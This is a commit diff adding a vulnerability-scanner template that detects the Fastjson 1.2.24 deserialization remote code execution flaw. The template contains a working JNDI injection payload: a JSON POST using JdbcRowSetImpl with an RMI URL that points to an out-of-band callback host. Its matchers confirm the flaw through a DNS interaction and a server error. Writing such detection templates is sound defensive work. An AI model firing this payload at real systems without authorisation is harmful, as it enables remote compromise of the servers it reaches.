Added Fastjson 1.2.24 Deserialization RCE

2021-10-11 01:16:37 +05:30 · 2021-10-11 01:16:37 +05:30 · 16ea26b295
parent ea52d761e4
commit 16ea26b295
1 changed files with 39 additions and 0 deletions
--- a/vulnerabilities/fastjson/fastjson-1224-rce.yaml
+++ b/vulnerabilities/fastjson/fastjson-1224-rce.yaml
@ -0,0 +1,39 @@
+id: fastjson-1224-rce
+
+info:
+  name: Fastjson 1.2.24 Deserialization RCE
+  author: zh
+  severity: critical
+  reference:
+    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
+    - https://www.freebuf.com/vuls/208339.html
+    - http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/
+  tags: fastjson,rce,deserialization
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+            "b":{
+                "@type":"com.sun.rowset.JdbcRowSetImpl",
+                "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
+                "autoCommit":true
+            }
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms DNS Interaction
+        words:
+          - "dns"
+
+      - type: word
+        condition: and
+        words:
+          - "Internal Server Error"
+          - "500"